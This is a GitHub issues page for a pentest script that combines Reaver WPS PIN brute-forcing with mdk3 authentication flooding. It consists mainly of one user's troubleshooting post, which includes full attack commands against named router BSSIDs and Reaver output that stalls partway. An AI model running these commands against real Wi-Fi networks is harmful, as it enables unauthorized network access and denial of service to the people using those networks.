pentest's People

Contributors

r0bag

pentest's Issues

USING REAVER IN UK ROUTERS 90% OF PROGRESS THEN STOPS

Hi there,

I've been trying to make use of the current Wi-Fi auditing techniques with regard to router password retrieval.

GEAR:

I've been through car boot sales and acquired some of the current routers on the market.
I've been using a Raspberry Pi Model 3B+ with Kali Linux installed, with

Wireless Card: Alfa AWUS036NH Driver: rt2800usb Chipset: Ralink Technology, Corp. RT2870/RT3070

As we already know, WEP routers are no longer being sold, so the only exploitability the system has, as I've been reading, apart from capturing the handshake and bruteforcing it (which will take me good weeks with a good computer, or paying for a server to do it for me, which I don't want), is WPS, so I wanted to try the WPS technique with reaver.
I'm not really familiarised with the concepts of this program, but I've tried to be cautious in setting it up, and as far as I know the WPS feature sometimes gets blocked when attempting too many PINs in a short period of time, so I made use of the script ReVdK3-r3.sh, which combines the power of Reaver with Mdk3 to automatically reset the router once it gets blocked.

PROGRAMS USED:

Reaver v1.6.5 WiFi Protected Setup Attack Tool
mdk3 Installed: 6.0-4

Being cautious, I set -d 5 and -t 5, which are the parameters that the script pretty much lets you tweak; sometimes I would even set them both to 10.

So I ended up with these inputs

(I will codify some of the MAC and ESSID with the wildcards in hashcat)
(assuming that -1 ?d?A?B?C?D?E?F (HEXADECIMAL))
( ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ)
( ?d = 0123456789 )

wash -i wlan0

00:F2:01:3C:?1?1:?1?1 11 -79 1.0 No BTHub3-?u?u?u?d
F8:1A:67:78:?1?1:?1?1 1 -69 1.0 No RealtekS TP-LINK_?d?d?d?u?d?d
20:A6:80:D2:?1?1:?1?1 6 -73 2.0 No RealtekS TALKTALK?u?d?u?d?d?u
60:38:E0:D4:?1?1:?1?1 6 -79 2.0 No RealtekS virginmedia?d?d?d?d?d?d?d

Using Reaver

reaver -i mon1 -b 00:F2:01:3C:?1?1:?1?1 -S -c 11 -d 5 -t 5 -l 10 -N -vv

Using mdk3 Dos Flood Attack

mdk3 mon1 a -a 00:F2:01:3C:?1?1:?1?1 -s 200 & mdk3 mon2 a -a 00:F2:01:3C:?1?1:?1?1 -s 200 & mdk3 mon3 a -a 00:F2:01:3C:?1?1:?1?1 -s 200

Then I get the following outputs (For the different routers)

00:F2:01:3C:?1?1:?1?1 11 -79 1.0 No BTHub3-?u?u?u?d

After trying some PINs it gets stuck at this point

[+] Trying pin "16585676"
[+] Associated with 00:F2:01:3C:?1?1:?1?1 (ESSID: BTHub3-?u?u?u?d)
[+] 15.15% complete @ 2018-06-16 05:55:31 (0 seconds/pin)
[+] Trying pin "16585676"

F8:1A:67:78:?1?1:?1?1 1 -69 1.0 No RealtekS TP-LINK_?d?d?d?u?d?d

After having tried PINs for entire days, it stopped at 99985677 and it doesn't go any further than that one

[+] Trying pin "99985677"
[!] Found packet with bad FCS, skipping...
[+] Associated with F8:1A:67:78:?1?1:?1?1 (ESSID: TP-LINK_?d?d?d?u?d?d)
[+] 90.90% complete @ 2018-06-16 06:51:05 (0 seconds/pin)
[!] WARNING: 25 successive start failures

20:A6:80:D2:?1?1:?1?1 6 -73 2.0 No RealtekS TALKTALK?u?d?u?d?d?u

[!] Found packet with bad FCS, skipping...
[+] Trying pin "99985677"
[+] Associated with 20:A6:80:D2:?1?1:?1?1 (ESSID: TALKTALK?u?d?u?d?d?u)
[+] 90.90% complete @ 2018-06-16 06:57:46 (0 seconds/pin)

Gets stuck at the same percentage as the previous one

60:38:E0:D4:?1?1:?1?1 6 -79 2.0 No RealtekS virginmedia?d?d?d?d?d?d?d

[+] Restored previous session
[+] Waiting for beacon from 60:38:E0:D4:?1?1:?1?1
[!] Found packet with bad FCS, skipping...
[+] Received beacon from 60:38:E0:D4:?1?1:?1?1
[+] Vendor: RealtekS
[+] Trying pin "88885674"
[+] Associated with 60:38:E0:D4:?1?1:?1?1 (ESSID: virginmedia?d?d?d?d?d?d?d)

Gets stuck as well in this PIN.


I reckon that in the ones that reached 90% of the process the router may have tricked reaver as if it was trying PINs, but it's suspicious to always reach 90% of the process; it was definitely losing my time.

Is there any workaround you reckon? How is the troubleshooting in these cases?
I have the session files in case you want them.

I have tried with lots of different routers, but those ones just don't start, so I'm not even bothered to post those ones (I don't even have the session saved).
Is there any guide to understand thoroughly the parameters of Reaver?
Btw I tried to use Bully but that one won't even try a single PIN.

Is this WPS vulnerability finally being fixed by router companies? If so, why doesn't it even work on 10-year-old routers (like BTHub3)? Has the router firmware been updated by some process?

If this exploit was fixed, does that mean that the only flaw there is now is capturing the handshake and bruteforcing it?

Best Regards community,

not work

trap: SIGINT: bad trap
ReVdK3-r3.sh: 204: function: not found
-e
Cleaning up all temporary files created by this script..good house keeping...ensuring all processes are killed!
ReVdK3-r3.sh: 207: cleanup: not found

Doesn't work

Hey,
When I run it I get an error:
./ReVdK3-r3.sh: line 5: syntax error near unexpected token newline
./ReVdK3-r3.sh: line 5:

Would appreciate your help

Reaver detected 25 successive eapol failures!

Hi there! First of all, nice work. I've been struggling to get into the router my ISP gave me, until I found this. But I have a question. Can I change the value? I would like it to be only 2-5 failures before it starts the eapol flood attack. Or is there a reason for this?

I have no knowledge of scripting so if it's possible to point me in the right direction.. Thanks!
